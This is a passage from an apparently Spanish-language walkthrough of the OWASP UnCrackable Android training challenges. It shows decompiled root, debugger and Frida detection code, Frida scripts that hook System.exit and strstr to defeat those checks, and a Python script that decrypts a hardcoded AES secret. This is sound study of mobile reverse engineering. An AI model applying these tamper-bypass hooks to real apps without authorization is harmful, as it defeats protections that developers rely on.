        return str != null && str.contains("test-keys");
    }

    public static boolean c() {
        for (String str : new String[]{"/system/app/Superuser.apk", "/system/xbin/daemonsu", "/system/etc/init.d/99SuperSUDaemon", "/system/bin/.ext/.su", "/system/etc/.has_su_daemon", "/system/etc/.installed_su_daemon", "/dev/com.koushikdutta.superuser.daemon/"}) {
            if (new File(str).exists()) {
                return true;
            }
        }
        return false;
    }
}

Vemos que estas comprobaciones se aplican al inicio:

protected void onCreate(Bundle bundle) {
    if (c.a() || c.b() || c.c()) {
        a("Root detected!");
    }
    if (b.a(getApplicationContext())) {
        a("App is debuggable!");
    }
    super.onCreate(bundle);
    setContentView(R.layout.activity_main);
}

Hookeando la fución con Frida

Haciendo uso de Frida, podemos saltarnos la protección. Para ello debemos ejecutar frida-server en el dispositivo víctima:

adb push frida-server /data/local/tmp
adb shell
su
cd /data/local/tmp/
./frida-server

A continuación, creamos un script bypass-check.js:

Java.perform(function() {
    var hook = Java.use("java.lang.System");
    hook.exit.implementation = function() {
        console.log("Root Check Bypassed!!! 😎");
    };
});

Esto convertirá las llamadas a exit en funciones vacías, permitiendonos saltarnos la protección. Para poder lanzar Frida debemos identificar el proceso de la aplicación:

adb shell ps | grep owasp

u0_a291       16690    687 5729020 120012 0                   0 S owasp.mstg.uncrackable1

Una vez tenemos el pid, podemos lanzar frida:

frida -U -p 16690 -l bypass-check.js

     ____
    / _  |   Frida 17.2.6 - A world-class dynamic instrumentation toolkit
   | (_| |
    > _  |   Commands:
   /_/ |_|       help      -> Displays the help system
   . . . .       object?   -> Display information about 'object'
   . . . .       exit/quit -> Exit
   . . . .
   . . . .   More info at https://frida.re/docs/home/
   . . . .
   . . . .   Connected to Mi Note 10 (id=b61dd82c)
                                                                                
[Mi Note 10::PID::16690 ]-> Root Check Bypassed!!! 😎

Obteniendo el código de verificación

La pantalla principal del programa nos pide un código de verificación. Por suerte podemos ver algo en el propio código del programa:

public class a {
    public static boolean a(String str) {
        byte[] bArr;
        byte[] bArr2 = new byte[0];
        try {
            bArr = sg.vantagepoint.a.a.a(b("8d127684cbc37c17616d806cf50473cc"), Base64.decode("5UJiFctbmgbDoLXmpL12mkno8HT4Lv8dlat8FxR2GOc=", 0));
        } catch (Exception e) {
            Log.d("CodeCheck", "AES error:" + e.getMessage());
            bArr = bArr2;
        }
        return str.equals(new String(bArr));
    }

    public static byte[] b(String str) {
        int length = str.length();
        byte[] bArr = new byte[length / 2];
        for (int i = 0; i < length; i += 2) {
            bArr[i / 2] = (byte) ((Character.digit(str.charAt(i), 16) << 4) + Character.digit(str.charAt(i + 1), 16));
        }
        return bArr;
    }
}

Dado que tenemos el código cifrado y la clave codificada como base64, podemos descifrarlo con un programa en python:

from base64 import b64decode
from Crypto.Cipher import AES

# Clave en hexadecimal
key_hex = "8d127684cbc37c17616d806cf50473cc"
key = bytes.fromhex(key_hex)

# Ciphertext en base64
ciphertext_b64 = "5UJiFctbmgbDoLXmpL12mkno8HT4Lv8dlat8FxR2GOc="
ciphertext = b64decode(ciphertext_b64)

# Descifrar con AES ECB
cipher = AES.new(key, AES.MODE_ECB)
plaintext = cipher.decrypt(ciphertext)

# Eliminar padding PKCS#7
padding_len = plaintext[-1]
plaintext = plaintext[:-padding_len]

# Mostrar resultado
print("El secreto es:", plaintext.decode())

python secret_extrator.py
El secreto es: I want to believe

Si lo introducimos en el programa podremos superar el reto!

Reconocimiento

Vemos que al igual que antes, se apican una serie de comprobaciones.

public class b {
    public static boolean a() {
        for (String str : System.getenv("PATH").split(":")) {
            if (new File(str, "su").exists()) {
                return true;
            }
        }
        return false;
    }

    public static boolean b() {
        String str = Build.TAGS;
        return str != null && str.contains("test-keys");
    }

    public static boolean c() {
        for (String str : new String[]{"/system/app/Superuser.apk", "/system/xbin/daemonsu", "/system/etc/init.d/99SuperSUDaemon", "/system/bin/.ext/.su", "/system/etc/.has_su_daemon", "/system/etc/.installed_su_daemon", "/dev/com.koushikdutta.superuser.daemon/"}) {
            if (new File(str).exists()) {
                return true;
            }
        }
        return false;
    }
}

[...]

public void onCreate(Bundle bundle) {
   init();
   if (b.a() || b.b() || b.c()) {
      a("Root detected!");
   }
   if (a.a(getApplicationContext())) {
      a("App is debuggable!");
   }
   [...]

Si vemos las comprobaciones, en ambos casos se llama a la misma función, que llama a System.exit:

public void a(String str) {
   AlertDialog create = new AlertDialog.Builder(this).create();
   create.setTitle(str);
   create.setMessage("This is unacceptable. The app is now going to exit.");
   create.setButton(-3, "OK", new DialogInterface.OnClickListener() { // from class: sg.vantagepoint.uncrackable2.MainActivity.1
      @Override // android.content.DialogInterface.OnClickListener
      public void onClick(DialogInterface dialogInterface, int i) {
            System.exit(0);
      }
   });
   create.setCancelable(false);
   create.show();
}

Hookeando la fución con Frida

Haciendo uso de Frida, podemos convertir la llamada a a en una función vacía, saltando la protección. Para ello, al igual que antes, debemos ejecutar frida-server en el dispositivo víctima:

adb push frida-server /data/local/tmp
adb shell
su
cd /data/local/tmp/
./frida-server

A continuación, creamos un script bypass-check.js (créditos a Niklas):

Java.perform(function () {
    var MainActivity = Java.use("sg.vantagepoint.uncrackable2.MainActivity");
      MainActivity.a.overload("java.lang.String").implementation = function(s) {
        console.log("Tamper detection suppressed, message was: " + s);
      }
});

Como la aplicación no se mantiene abierta, vamos a hacer que Frida la spawnee:

frida -U -f owasp.mstg.uncrackable2 -l bypass-check.js

     ____
    / _  |   Frida 17.2.6 - A world-class dynamic instrumentation toolkit
   | (_| |
    > _  |   Commands:
   /_/ |_|       help      -> Displays the help system
   . . . .       object?   -> Display information about 'object'
   . . . .       exit/quit -> Exit
   . . . .
   . . . .   More info at https://frida.re/docs/home/
   . . . .
   . . . .   Connected to Mi Note 10 (id=b61dd82c)
Spawned `owasp.mstg.uncrackable2`. Resuming main thread!                
[Mi Note 10::owasp.mstg.uncrackable2 ]-> Tamper detection suppressed, message was: Root detected!

Obteniendo el código de verificación

local_38 = 0x6e616854;   // 'Than'
uStack_34 = 0x6620736b;  // 'ks f'
uStack_30 = 0x6120726f;  // 'or a'
uStack_2c = 0x74206c6c;  // 'll t'
local_28 = 0x68736966206568; // 'he fisih' -> probablemente mal decompilado: 'he fish'

Si lo introducimos en el programa podremos superar el reto!

Reconocimiento

Vamos a comenzar echando un vistazo al código fuente con jadx. En la MainActivity, podemos ver algunas líneas interesantes, como una clave XOR pizzapizzapizzapizzapizz, la declaración de dos métodos nativos (baz e init) y la carga de una librería libfoo.so:

private static final String TAG = "UnCrackable3";
static int tampered = 0;
private static final String xorkey = "pizzapizzapizzapizzapizz";
private CodeCheck check;
Map<String, Long> crc;

private native long baz();

private native void init(byte[] bArr);

[...]

static {
    System.loadLibrary("foo");
}

Al entrar se ejecuta la función OnCreate:

public void onCreate(Bundle bundle) {
    verifyLibs();
    init(xorkey.getBytes());
    new AsyncTask<Void, String, String>() { // from class: sg.vantagepoint.uncrackable3.MainActivity.2
        /* JADX INFO: Access modifiers changed from: protected */
        @Override // android.os.AsyncTask
        public String doInBackground(Void... voidArr) {
            while (!Debug.isDebuggerConnected()) {
                SystemClock.sleep(100L);
            }
            return null;
        }

        /* JADX INFO: Access modifiers changed from: protected */
        @Override // android.os.AsyncTask
        public void onPostExecute(String str) {
            MainActivity.this.showDialog("Debugger detected!");
            System.exit(0);
        }
    }.execute(null, null, null);
    if (RootDetection.checkRoot1() || RootDetection.checkRoot2() || RootDetection.checkRoot3() || IntegrityCheck.isDebuggable(getApplicationContext()) || tampered != 0) {
        showDialog("Rooting or tampering detected.");
    }
    this.check = new CodeCheck();
    super.onCreate(bundle);
    setContentView(owasp.mstg.uncrackable3.R.layout.activity_main);
}

Esta función realiza una serie de operaciones:

• Llama a verifyLibs, que comprueba la integridad de las librerías nativas mediante el checksum CRC. Cabe recalcar que no se comprueba criptográficamente la firma de las mismas.
• Con init, inicialliza las librerías nativas, eviando como parámetro la clave XOR antes mencionada (pizzapizzapizzapizzapizz).
• Realiza una comprobación en busca de debuggers, privilegios de root ó tampering, en caso de enontrarlos sale del programa.

Métodos de detección

Vamos a analizar cada método de detección por separado.

Verificación de las librerías

La función es la siguiente:

private void verifyLibs() {
    this.crc = new HashMap();
    this.crc.put("armeabi-v7a", Long.valueOf(Long.parseLong(getResources().getString(owasp.mstg.uncrackable3.R.string.armeabi_v7a))));
    this.crc.put("arm64-v8a", Long.valueOf(Long.parseLong(getResources().getString(owasp.mstg.uncrackable3.R.string.arm64_v8a))));
    this.crc.put("x86", Long.valueOf(Long.parseLong(getResources().getString(owasp.mstg.uncrackable3.R.string.x86))));
    this.crc.put("x86_64", Long.valueOf(Long.parseLong(getResources().getString(owasp.mstg.uncrackable3.R.string.x86_64))));
    try {
        ZipFile zipFile = new ZipFile(getPackageCodePath());
        for (Map.Entry<String, Long> entry : this.crc.entrySet()) {
            String str = "lib/" + entry.getKey() + "/libfoo.so";
            ZipEntry entry2 = zipFile.getEntry(str);
            Log.v(TAG, "CRC[" + str + "] = " + entry2.getCrc());
            if (entry2.getCrc() != entry.getValue().longValue()) {
                tampered = 31337;
                Log.v(TAG, str + ": Invalid checksum = " + entry2.getCrc() + ", supposed to be " + entry.getValue());
            }
        }
        ZipEntry entry3 = zipFile.getEntry("classes.dex");
        Log.v(TAG, "CRC[classes.dex] = " + entry3.getCrc());
        if (entry3.getCrc() != baz()) {
            tampered = 31337;
            Log.v(TAG, "classes.dex: crc = " + entry3.getCrc() + ", supposed to be " + baz());
        }
    } catch (IOException unused) {
        Log.v(TAG, "Exception");
        System.exit(0);
    }
}

La función comienza declarando un hashmap con los valores esperados para cada checksum, para después comprobarlos con los del propio apk. Podríamos tratar de saltar estas protecciones y modificar el programa, sin embargo no es lo más sencillo en este caso.

Anti-debuggers

Se lanza una tarea en paralelo que detecta debuggers conectados al programa.

    new AsyncTask<Void, String, String>() { // from class: sg.vantagepoint.uncrackable3.MainActivity.2
        /* JADX INFO: Access modifiers changed from: protected */
        @Override // android.os.AsyncTask
        public String doInBackground(Void... voidArr) {
            while (!Debug.isDebuggerConnected()) {
                SystemClock.sleep(100L);
            }
            return null;
        }

        /* JADX INFO: Access modifiers changed from: protected */
        @Override // android.os.AsyncTask
        public void onPostExecute(String str) {
            MainActivity.this.showDialog("Debugger detected!");
            System.exit(0);
        }
    }.execute(null, null, null);

Anti-root

Finalmente, se lanzan las comprobaciones de los niveles anteriores para detectar el uso del superusuario.

public class RootDetection {
    public static boolean checkRoot1() {
        for (String str : System.getenv("PATH").split(":")) {
            if (new File(str, "su").exists()) {
                return true;
            }
        }
        return false;
    }

    public static boolean checkRoot2() {
        String str = Build.TAGS;
        return str != null && str.contains("test-keys");
    }

    public static boolean checkRoot3() {
        for (String str : new String[]{"/system/app/Superuser.apk", "/system/xbin/daemonsu", "/system/etc/init.d/99SuperSUDaemon", "/system/bin/.ext/.su", "/system/etc/.has_su_daemon", "/system/etc/.installed_su_daemon", "/dev/com.koushikdutta.superuser.daemon/"}) {
            if (new File(str).exists()) {
                return true;
            }
        }
        return false;
    }
}

En esta parte también se comprueba que la flag de debug no esté activa:

public class IntegrityCheck {
    public static boolean isDebuggable(Context context) {
        return (context.getApplicationContext().getApplicationInfo().flags & 2) != 0;
    }
}

Analizando las librerías externas

Podemos analizar la librería libfoo.so con algun decompilador como ghidra.

Anti-hook

Comenzaremos con la función init:

void _INIT_0(void)

{
  long lVar1;
  int result;
  pthread_t thread;
  long canary;
  
  lVar1 = tpidr_el0;
  canary = *(long *)(lVar1 + 0x28);
  result = pthread_create(&thread,(pthread_attr_t *)0x0,FUN_001030d0,(void *)0x0);
  DAT_00115040 = 0;
  DAT_00115048 = 0;
  DAT_00115038 = 0;
  DAT_00115050 = 0;
  DAT_00115054 = DAT_00115054 + 1;
  if (*(long *)(lVar1 + 0x28) == canary) {
    return;
  }
                    /* WARNING: Subroutine does not return */
  __stack_chk_fail(result);
}

Vemos que está utilizando pthread_create para iniciar un hilo de ejecución que ejecutará la función FUN_001030d0, esta parte tal vez tiene que ver con la detección de debuggers que vimos antes, ya que funcionaba en un hilo separado. Vamos a echar un vistazo a esa función:

void FUN_001030d0(void)

{
  long lVar1;
  int iVar2;
  FILE *__stream;
  char *pcVar3;
  char *unaff_x19;
  pthread_t pStack_270;
  long lStack_268;
  char *pcStack_260;
  undefined *puStack_250;
  code *pcStack_248;
  char acStack_240 [512];
  
  puStack_250 = &stack0xfffffffffffffff0;
  __stream = fopen("/proc/self/maps","r");
  if (__stream == (FILE *)0x0) {
LAB_00103180:
    pcVar3 = "Error opening /proc/self/maps! Terminating...";
  }
  else {
    unaff_x19 = "/proc/self/maps";
    do {
      while (pcVar3 = fgets(acStack_240,0x200,__stream), pcVar3 == (char *)0x0) {
        fclose(__stream);
        usleep(500);
        __stream = fopen("/proc/self/maps","r");
        if (__stream == (FILE *)0x0) goto LAB_00103180;
      }
      pcVar3 = strstr(acStack_240,"frida");
    } while ((pcVar3 == (char *)0x0) &&
            (pcVar3 = strstr(acStack_240,"xposed"), pcVar3 == (char *)0x0));
    pcVar3 = "Tampering detected! Terminating...";
  }
  __android_log_print(2,"UnCrackable3",pcVar3);
  goodbye();
  pcStack_248 = _INIT_0;
  lVar1 = tpidr_el0;
  lStack_268 = *(long *)(lVar1 + 0x28);
  pcStack_260 = unaff_x19;
  iVar2 = pthread_create(&pStack_270,(pthread_attr_t *)0x0,FUN_001030d0,(void *)0x0);
  DAT_00115040 = 0;
  DAT_00115048 = 0;
  DAT_00115038 = 0;
  DAT_00115050 = 0;
  DAT_00115054 = DAT_00115054 + 1;
  if (*(long *)(lVar1 + 0x28) != lStack_268) {
                    /* WARNING: Subroutine does not return */
    __stack_chk_fail(iVar2);
  }
  return;
}

De forma simplificada, se está abriendo el /proc/self/maps, que contiene el mapeo de memoria de todos los procesos, y uno a uno va comprobando si corresponde a "frida" o a "xposed", dos de los debuggers más utilzados. Esta protección nos impide acoplarnos a un proceso para hookear funciones. Sin embargo, aunque resulte paradójico, podemos utilizar Frida para saltarnos esta protección.

Vemos que para salir se llama a la función goodbye.

Anti-debug

Si nos fijamos ahora en la llamada JNI init, vemos la siguiente función:

void Java_sg_vantagepoint_uncrackable3_MainActivity_init
               (long *param_1,undefined8 param_2,undefined8 param_3)

{
  char *__src;
  
  anti_debug();
  __src = (char *)(**(code **)(*param_1 + 0x5c0))(param_1,param_3,0);
  strncpy((char *)&DAT_00115038,__src,0x18);
  (**(code **)(*param_1 + 0x600))(param_1,param_3,__src,2);
  DAT_00115054 = DAT_00115054 + 1;
  return;
}

Esta función ejecuta una función que he llamado anti_debug:

void anti_debug(void)

{
  long lVar1;
  __pid_t _Var2;
  uint uVar3;
  uint uVar4;
  ulong uVar5;
  pthread_t local_30;
  long local_28;
  
  lVar1 = tpidr_el0;
  local_28 = *(long *)(lVar1 + 0x28);
  _Var2 = fork();
  if (_Var2 == 0) {
    uVar3 = getppid();
    uVar5 = ptrace(PTRACE_ATTACH,(ulong)uVar3,0,0);
    if (uVar5 == 0) {
      waitpid(uVar3,(int *)&local_30,0);
      while( true ) {
        ptrace(PTRACE_CONT,(ulong)uVar3,0,0);
        uVar4 = waitpid(uVar3,(int *)&local_30,0);
        uVar5 = (ulong)uVar4;
        if (uVar4 == 0) break;
        if ((~(uint)local_30 & 0x7f) != 0) {
                    /* WARNING: Subroutine does not return */
          _exit(0);
        }
      }
    }
  }
  else {
    uVar3 = pthread_create(&local_30,(pthread_attr_t *)0x0,FUN_0010322c,(void *)0x0);
    uVar5 = (ulong)uVar3;
  }
  if (*(long *)(lVar1 + 0x28) == local_28) {
    return;
  }
                    /* WARNING: Subroutine does not return */
  __stack_chk_fail(uVar5);
}

Esta función implementa un método de protección que podemos llamar self-debug. Esto se aprovecha de que un programa sólo puede tener enlazado un debugger, por tanto, creando un proceso hijo evita que se pueda enlazar otro proceso.

Explotación

En este punto tenemos varias protecciones que bypasear.

Bypasear el anti-root

Lo primero es bypasear el anti-root. Para ello podemos simplemente ejecutar el siguiente script con Frida:

Java.perform(function () {
    var System = Java.use('java.lang.System');

    System.exit.overload('int').implementation = function (code) {
        console.log('[Bypass] System.exit called with code:', code);
        // No hacer nada para evitar que la app termine
    };
});

Con eso ya podríamos empezar, pero aún hay que sortear el resto de protecciones.

Bypasear las protecciones nativas

Como hemos visto antes, el programa comprobaba si se utilizaba frida mediante la función strstr. Por tanto, basta con hookear esa función y hacer que devuelva null como si no se hubiera encontrado nada. Para ello hookear funciones nativas con frida, se utiliza el Interceptor:

Interceptor.attach(Module.findExportByName(null, 'strstr'), {
    onEnter: function (args) {
        // args[0] = haystack, args[1] = needle
        var haystack = Memory.readUtf8String(args[0]);
        var needle = Memory.readUtf8String(args[1]);
        console.log('strstr called with haystack:', haystack, 'needle:', needle);
    },
    onLeave: function (retval) {
        // Forzar retorno NULL
        retval.replace(ptr('0x0'));
        console.log('strstr hooked: forced return NULL');
    }
});